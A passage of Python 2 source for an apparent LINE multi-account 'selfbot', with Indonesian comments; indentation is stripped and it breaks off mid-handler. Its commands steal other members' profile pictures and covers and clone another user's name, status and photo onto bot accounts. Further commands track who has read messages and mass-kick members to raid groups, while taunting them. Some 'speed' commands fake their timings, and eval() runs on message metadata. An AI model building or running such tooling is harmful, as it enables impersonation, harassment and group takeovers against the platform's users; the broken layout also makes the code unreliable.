elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Ancurin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ✰Ќriֆ✰ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ♪")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["One piece","Kr asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Kabur all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kabur"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
if target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
